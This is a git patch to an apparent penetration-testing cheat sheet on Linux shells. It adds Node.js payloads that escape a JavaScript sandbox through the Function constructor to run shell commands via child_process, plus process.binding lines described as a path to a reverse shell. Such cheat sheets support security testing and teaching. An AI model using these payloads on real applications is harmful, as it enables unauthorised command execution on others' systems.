From 17e40afefd740ba4c71e6f406aff3b7c7681c485 Mon Sep 17 00:00:00 2001
From: CPol
Date: Sun, 29 May 2022 23:24:32 +0000
Subject: [PATCH] GitBook: [#3225] No subject
---
 generic-methodologies-and-resources/shells/linux.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)
diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/shells/linux.md
index f8cf74b75..72c96786f 100644
--- a/generic-methodologies-and-resources/shells/linux.md
+++ b/generic-methodologies-and-resources/shells/linux.md
@@ -194,6 +194,19 @@ or
 or
+// If you get to the constructor of a function you can define and execute another function inside a string
+"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
+"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
+
+
+or
+
+// Abuse this syntax to get a reverse shell
+var fs = this.process.binding('fs');
+var fs = process.binding('fs');
+
+or
+
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```